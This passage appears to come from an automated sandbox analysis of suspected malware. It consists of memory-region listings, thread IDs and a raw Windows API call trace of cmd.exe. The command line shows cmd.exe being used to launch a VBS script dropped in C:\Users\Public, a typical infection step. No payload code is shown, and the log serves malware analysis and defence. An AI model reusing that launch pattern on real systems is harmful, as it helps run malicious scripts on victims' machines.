region_type = private name = "private_0x000000007ffd6000" filename = "" Region: id = 830 start_va = 0x7ffd7000 end_va = 0x7ffd7fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd7000" filename = "" Region: id = 831 start_va = 0x7ffd8000 end_va = 0x7ffd8fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 832 start_va = 0x7ffd9000 end_va = 0x7ffd9fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd9000" filename = "" Region: id = 833 start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 834 start_va = 0x7ffdb000 end_va = 0x7ffdbfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 835 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 836 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 837 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 838 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 844 start_va = 0x73b30000 end_va = 0x73b3efff entry_point = 0x73b312a1 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" Region: id = 845 start_va = 0x73b40000 end_va = 0x73b48fff entry_point = 0x73b415a6 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" Thread: id = 54 os_tid = 0xdb0 Thread: id = 55 os_tid = 0xd9c Thread: id = 56 os_tid = 0xd78 Thread: id = 57 os_tid = 0xc94 Thread: id = 58 os_tid = 0xc44 Thread: id = 59 os_tid = 0xbf0 Thread: id = 60 os_tid = 0xb4c Thread: id = 61 os_tid = 0xb40 Thread: id = 62 os_tid = 0x604 Thread: id = 63 os_tid = 0x468 Thread: id = 64 os_tid = 0x450 Thread: id = 65 os_tid = 0x3ac Thread: id = 66 os_tid = 0x37c Thread: id = 67 os_tid = 0x368 Thread: id = 68 os_tid = 0x320 Thread: id = 69 os_tid = 0x31c Thread: id = 70 os_tid = 0x318 Thread: id = 71 os_tid = 0x2f0 Thread: id = 72 os_tid = 0x2ec Thread: id = 73 os_tid = 0x2d8 Thread: id = 74 os_tid = 0x2c8 Thread: id = 75 os_tid = 0x2bc Thread: id = 76 os_tid = 0xde4 Thread: id = 77 os_tid = 0xe50 Thread: id = 78 os_tid = 0xe54 Thread: id = 79 os_tid = 0xe6c Thread: id = 95 os_tid = 0xf90 Thread: id = 119 os_tid = 0xb24 Process: id = "5" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7f09e3e0" os_pid = "0xef8" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x4f0" cmd_line = "cmd /k \"C:\\Users\\Public\\N3Eg\\N3E.vbs\"" cur_dir = "C:\\Windows\\system32\\" Region: id = 849 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 850 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 851 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 852 start_va = 0xc0000 end_va = 0x1bffff entry_point = 0x0 region_type = private name = "private_0x00000000000c0000" filename = "" Region: id = 853 start_va = 0x4a810000 end_va = 0x4a85bfff entry_point = 0x4a81829a region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" Region: id = 854 start_va = 0x77200000 end_va = 0x7733bfff entry_point = 0x77200000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" Region: id = 855 start_va = 0x77440000 end_va = 0x77440fff entry_point = 0x77440000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" Region: id = 856 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 857 start_va = 0x7ffd3000 end_va = 0x7ffd3fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd3000" filename = "" Region: id = 858 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 859 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 860 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 861 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" Region: id = 862 start_va = 0x210000 end_va = 0x21ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 863 start_va = 0x320000 end_va = 0x41ffff entry_point = 0x0 region_type = private name = "private_0x0000000000320000" filename = "" Region: id = 864 start_va = 0x6dd80000 end_va = 0x6dd86fff entry_point = 0x6dd81230 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" Region: id = 865 start_va = 0x75510000 end_va = 0x75559fff entry_point = 0x75517de0 region_type = mapped_file name = "KernelBase.dll" filename = "\\Windows\\System32\\KernelBase.dll" Region: id = 866 start_va = 0x75900000 end_va = 0x759d3fff entry_point = 0x7594bde4 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" Region: id = 867 start_va = 0x76ca0000 end_va = 0x76d68fff entry_point = 0x76cbd711 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" Region: id = 868 start_va = 0x76dd0000 end_va = 0x76e1dfff entry_point = 0x76dd9c09 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" Region: id = 869 start_va = 0x76f70000 end_va = 0x7701bfff entry_point = 0x76f7a472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" Region: id = 870 start_va = 0x77020000 end_va = 0x770bcfff entry_point = 0x77053fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" Region: id = 871 start_va = 0x77350000 end_va = 0x77359fff entry_point = 0x7735136c region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" Region: id = 872 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 873 start_va = 0x220000 end_va = 0x2e7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000220000" filename = "" Region: id = 874 start_va = 0x75830000 end_va = 0x758fbfff entry_point = 0x7583168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" Region: id = 875 start_va = 0x76630000 end_va = 0x7664efff entry_point = 0x76631355 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" Region: id = 876 start_va = 0x1c0000 end_va = 0x1c6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 877 start_va = 0x1d0000 end_va = 0x1d1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 878 start_va = 0x1e0000 end_va = 0x1e0fff entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 879 start_va = 0x1f0000 end_va = 0x1f0fff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 880 start_va = 0x420000 end_va = 0x520fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 881 start_va = 0x530000 end_va = 0x112ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 882 start_va = 0x1130000 end_va = 0x13bafff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001130000" filename = "" Region: id = 883 start_va = 0x13c0000 end_va = 0x168efff entry_point = 0x13c0000 region_type = mapped_file name = "SortDefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" Region: id = 884 start_va = 0x759e0000 end_va = 0x76629fff entry_point = 0x75a61601 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" Region: id = 885 start_va = 0x76d70000 end_va = 0x76dc6fff entry_point = 0x76d89ba6 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" Region: id = 886 start_va = 0x200000 end_va = 0x201fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000200000" filename = "" Region: id = 887 start_va = 0x300000 end_va = 0x301fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000300000" filename = "" Region: id = 888 start_va = 0x74110000 end_va = 0x742adfff entry_point = 0x7413e6b5 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll" Region: id = 889 start_va = 0x2f0000 end_va = 0x2f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 890 start_va = 0x1740000 end_va = 0x183ffff entry_point = 0x0 region_type = private name = "private_0x0000000001740000" filename = "" Region: id = 891 start_va = 0x752a0000 end_va = 0x752abfff entry_point = 0x752a10e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" Region: id = 892 start_va = 0x76a90000 end_va = 0x76bebfff entry_point = 0x76adba3d region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" Region: id = 893 start_va = 0x76bf0000 end_va = 0x76c90fff entry_point = 0x76c22433 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" Region: id = 894 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 895 start_va = 0x1950000 end_va = 0x198ffff entry_point = 0x0 region_type = private name = "private_0x0000000001950000" filename = "" Region: id = 896 start_va = 0x74090000 end_va = 0x740cffff entry_point = 0x7409a2dd region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" Region: id = 897 start_va = 0x1840000 end_va = 0x191efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001840000" filename = "" Region: id = 898 start_va = 0x745a0000 end_va = 0x74694fff entry_point = 0x745b0d9e region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" Region: id = 899 start_va = 0x76ee0000 end_va = 0x76f6efff entry_point = 0x76ee3fb1 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" Region: id = 900 start_va = 0x310000 end_va = 0x310fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000310000" filename = "" Region: id = 901 start_va = 0x76650000 end_va = 0x766effff entry_point = 0x766649e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" Region: id = 902 start_va = 0x76e20000 end_va = 0x76ea2fff entry_point = 0x76e223d2 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" Region: id = 903 start_va = 0x773d0000 end_va = 0x773e8fff entry_point = 0x773d4975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" Region: id = 904 start_va = 0x1690000 end_va = 0x1690fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001690000" filename = "" Region: id = 905 start_va = 0x739c0000 end_va = 0x739e0fff entry_point = 0x739c145e region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" Region: id = 906 start_va = 0x757d0000 end_va = 0x75814fff entry_point = 0x757d11e1 region_type = mapped_file name = "Wldap32.dll" filename = "\\Windows\\System32\\Wldap32.dll" Region: id = 907 start_va = 0x16b0000 end_va = 0x16ccfff entry_point = 0x16b0000 region_type = mapped_file name = "{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x000000000000000c.db" filename = "\\Users\\DSsDPMx042\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x000000000000000c.db" Region: id = 908 start_va = 0x16d0000 end_va = 0x16d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000016d0000" filename = "" Region: id = 909 start_va = 0x75350000 end_va = 0x7535afff entry_point = 0x75351992 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" Region: id = 910 start_va = 0x16a0000 end_va = 0x16a3fff entry_point = 0x16a0000 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" Region: id = 911 start_va = 0x16e0000 end_va = 0x170ffff entry_point = 0x16e0000 region_type = mapped_file name = "{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000007.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000007.db" Region: id = 912 start_va = 0x1710000 end_va = 0x1713fff entry_point = 0x1710000 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" Region: id = 913 start_va = 0x1990000 end_va = 0x19f5fff entry_point = 0x1990000 region_type = mapped_file name = "{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db" Region: id = 914 start_va = 0x1a00000 end_va = 0x1df2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001a00000" filename = "" Region: id = 915 start_va = 0x753c0000 end_va = 0x753cbfff entry_point = 0x753c238e region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" Region: id = 916 start_va = 0x753d0000 end_va = 0x754ecfff entry_point = 0x753d158a region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" Region: id = 917 start_va = 0x75650000 end_va = 0x75744fff entry_point = 0x75651865 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\System32\\wininet.dll" Region: id = 918 start_va = 0x76890000 end_va = 0x76a8afff entry_point = 0x768922d9 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\System32\\iertutil.dll" Region: id = 919 start_va = 0x770c0000 end_va = 0x771f5fff entry_point = 0x770c1b35 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\System32\\urlmon.dll" Region: id = 920 start_va = 0x1e00000 end_va = 0x1efffff entry_point = 0x0 region_type = private name = "private_0x0000000001e00000" filename = "" Region: id = 921 start_va = 0x75280000 end_va = 0x7529afff entry_point = 0x752893b9 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" Region: id = 922 start_va = 0x1720000 end_va = 0x1720fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001720000" filename = "" Region: id = 923 start_va = 0x1f90000 end_va = 0x208ffff entry_point = 0x0 region_type = private name = "private_0x0000000001f90000" filename = "" Region: id = 924 start_va = 0x2160000 end_va = 0x225ffff entry_point = 0x0 region_type = private name = "private_0x0000000002160000" filename = "" Region: id = 925 start_va = 0x754f0000 end_va = 0x75501fff entry_point = 0x754f1441 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" Region: id = 926 start_va = 0x75590000 end_va = 0x755b6fff entry_point = 0x755958b9 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" Region: id = 927 start_va = 0x766f0000 end_va = 0x7688cfff entry_point = 0x766f17e7 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" Region: id = 928 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 929 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Thread: id = 80 os_tid = 0xefc [0221.795] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1bff6c | out: lpSystemTimeAsFileTime=0x1bff6c*(dwLowDateTime=0xdf4f9050, dwHighDateTime=0x1d204ef)) [0221.795] GetCurrentProcessId () returned 0xef8 [0221.795] GetCurrentThreadId () returned 0xefc [0221.795] GetTickCount () returned 0x3ee73 [0221.795] QueryPerformanceCounter (in: lpPerformanceCount=0x1bff64 | out: lpPerformanceCount=0x1bff64*=16438672289839) returned 1 [0221.796] GetModuleHandleA (lpModuleName=0x0) returned 0x4a810000 [0221.796] __set_app_type (_Type=0x1) [0221.796] __p__fmode () returned 0x770131f4 [0221.796] __p__commode () returned 0x770131fc [0221.796] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a8321a6) returned 0x0 [0221.797] __getmainargs (in: _Argc=0x4a834238, _Argv=0x4a834240, _Env=0x4a83423c, _DoWildCard=0, _StartInfo=0x4a834140 | out: _Argc=0x4a834238, _Argv=0x4a834240, _Env=0x4a83423c) returned 0 [0221.797] GetCurrentThreadId () returned 0xefc [0221.797] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xefc) returned 0x38 [0221.797] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75900000 [0221.797] GetProcAddress (hModule=0x75900000, lpProcName="SetThreadUILanguage") returned 0x759524c2 [0221.797] SetThreadUILanguage (LangId=0x0) returned 0x409 [0221.797] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0221.797] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1bfefc | out: phkResult=0x1bfefc*=0x0) returned 0x2 [0221.797] VirtualQuery (in: lpAddress=0x1bff33, lpBuffer=0x1bfecc, dwLength=0x1c | out: lpBuffer=0x1bfecc*(BaseAddress=0x1bf000, AllocationBase=0xc0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0221.798] VirtualQuery (in: lpAddress=0xc0000, lpBuffer=0x1bfecc, dwLength=0x1c | out: lpBuffer=0x1bfecc*(BaseAddress=0xc0000, AllocationBase=0xc0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0221.798] VirtualQuery (in: lpAddress=0xc1000, lpBuffer=0x1bfecc, dwLength=0x1c | out: lpBuffer=0x1bfecc*(BaseAddress=0xc1000, AllocationBase=0xc0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0221.798] VirtualQuery (in: lpAddress=0xc3000, lpBuffer=0x1bfecc, dwLength=0x1c | out: lpBuffer=0x1bfecc*(BaseAddress=0xc3000, AllocationBase=0xc0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0221.798] VirtualQuery (in: lpAddress=0x1c0000, lpBuffer=0x1bfecc, dwLength=0x1c | out: lpBuffer=0x1bfecc*(BaseAddress=0x1c0000, AllocationBase=0x1c0000, AllocationProtect=0x2, RegionSize=0x7000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0221.798] GetConsoleOutputCP () returned 0x1b5 [0221.798] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a834260 | out: lpCPInfo=0x4a834260) returned 1 [0221.798] SetConsoleCtrlHandler (HandlerRoutine=0x4a82e72a, Add=1) returned 1 [0221.798] _get_osfhandle (_FileHandle=1) returned 0x7 [0221.798] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0221.798] _get_osfhandle (_FileHandle=1) returned 0x7 [0221.798] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a8341ac | out: lpMode=0x4a8341ac) returned 1 [0221.799] _get_osfhandle (_FileHandle=1) returned 0x7 [0221.799] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0221.799] _get_osfhandle (_FileHandle=0) returned 0x3 [0221.799] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a8341b0 | out: lpMode=0x4a8341b0) returned 1 [0221.800] _get_osfhandle (_FileHandle=0) returned 0x3 [0221.800] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0221.800] GetEnvironmentStringsW () returned 0x330250 [0221.800] FreeEnvironmentStringsW (penv=0x330250) returned 1 [0221.801] GetEnvironmentStringsW () returned 0x330250 [0221.801] FreeEnvironmentStringsW (penv=0x330250) returned 1 [0221.801] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1bee6c | out: phkResult=0x1bee6c*=0x40) returned 0x0 [0221.801] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1bee74, lpData=0x1bee78, lpcbData=0x1bee70*=0x1000 | out: lpType=0x1bee74*=0x0, lpData=0x1bee78*=0x0, lpcbData=0x1bee70*=0x1000) returned 0x2 [0221.801] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1bee74, lpData=0x1bee78, lpcbData=0x1bee70*=0x1000 | out: lpType=0x1bee74*=0x4, lpData=0x1bee78*=0x1, lpcbData=0x1bee70*=0x4) returned 0x0 [0221.801] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1bee74, lpData=0x1bee78, lpcbData=0x1bee70*=0x1000 | out: lpType=0x1bee74*=0x0, lpData=0x1bee78*=0x1, lpcbData=0x1bee70*=0x1000) returned 0x2 [0221.801] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1bee74, lpData=0x1bee78, lpcbData=0x1bee70*=0x1000 | out: lpType=0x1bee74*=0x4, lpData=0x1bee78*=0x0, lpcbData=0x1bee70*=0x4) returned 0x0 [0221.801] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1bee74, lpData=0x1bee78, lpcbData=0x1bee70*=0x1000 | out: lpType=0x1bee74*=0x4, lpData=0x1bee78*=0x40, lpcbData=0x1bee70*=0x4) returned 0x0 [0221.801] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1bee74, lpData=0x1bee78, lpcbData=0x1bee70*=0x1000 | out: lpType=0x1bee74*=0x4, lpData=0x1bee78*=0x40, lpcbData=0x1bee70*=0x4) returned 0x0 [0221.801] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1bee74, lpData=0x1bee78, lpcbData=0x1bee70*=0x1000 | out: lpType=0x1bee74*=0x0, lpData=0x1bee78*=0x40, lpcbData=0x1bee70*=0x1000) returned 0x2 [0221.801] RegCloseKey (hKey=0x40) returned 0x0 [0221.801] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1bee6c | out: phkResult=0x1bee6c*=0x40) returned 0x0 [0221.801] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1bee74, lpData=0x1bee78, lpcbData=0x1bee70*=0x1000 | out: lpType=0x1bee74*=0x0, lpData=0x1bee78*=0x40, lpcbData=0x1bee70*=0x1000) returned 0x2 [0221.801] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1bee74, lpData=0x1bee78, lpcbData=0x1bee70*=0x1000 | out: lpType=0x1bee74*=0x4, lpData=0x1bee78*=0x1, lpcbData=0x1bee70*=0x4) returned 0x0 [0221.802] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1bee74, lpData=0x1bee78, lpcbData=0x1bee70*=0x1000 | out: lpType=0x1bee74*=0x0, lpData=0x1bee78*=0x1, lpcbData=0x1bee70*=0x1000) returned 0x2 [0221.802] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1bee74, lpData=0x1bee78, lpcbData=0x1bee70*=0x1000 | out: lpType=0x1bee74*=0x4, lpData=0x1bee78*=0x0, lpcbData=0x1bee70*=0x4) returned 0x0 [0221.802] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1bee74, lpData=0x1bee78, lpcbData=0x1bee70*=0x1000 | out: lpType=0x1bee74*=0x4, lpData=0x1bee78*=0x9, lpcbData=0x1bee70*=0x4) returned 0x0 [0221.802] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1bee74, lpData=0x1bee78, lpcbData=0x1bee70*=0x1000 | out: lpType=0x1bee74*=0x4, lpData=0x1bee78*=0x9, lpcbData=0x1bee70*=0x4) returned 0x0 [0221.802] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1bee74, lpData=0x1bee78, lpcbData=0x1bee70*=0x1000 | out: lpType=0x1bee74*=0x0, lpData=0x1bee78*=0x9, lpcbData=0x1bee70*=0x1000) returned 0x2 [0221.802] RegCloseKey (hKey=0x40) returned 0x0 [0221.802] time (in: timer=0x0 | out: timer=0x0) returned 0x57c93147 [0221.802] srand (_Seed=0x57c93147) [0221.802] GetCommandLineW () returned="cmd /k \"C:\\Users\\Public\\N3Eg\\N3E.vbs\"" [0221.802] GetCommandLineW () returned="cmd /k \"C:\\Users\\Public\\N3Eg\\N3E.vbs\"" [0221.802] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a835260 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0221.802] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x330258, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0221.803] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a840640, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0221.803] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a840640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0221.803] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a840640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0221.803] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0221.803] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0221.803] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0221.803] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0221.803] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0221.803] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0221.803] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0221.803] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0221.803] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0221.803] GetEnvironmentStringsW () returned 0x330468 [0221.803] FreeEnvironmentStringsW (penv=0x330468) returned 1 [0221.804] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a840640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0221.804] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a840640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0221.804] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0221.804] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0221.804] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0221.804] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0221.804] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0221.804] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0221.804] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0221.804] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0221.804] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1bfc38 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0221.804] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x104, lpBuffer=0x1bfc38, lpFilePart=0x1bfc34 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x1bfc34*="system32") returned 0x13 [0221.804] 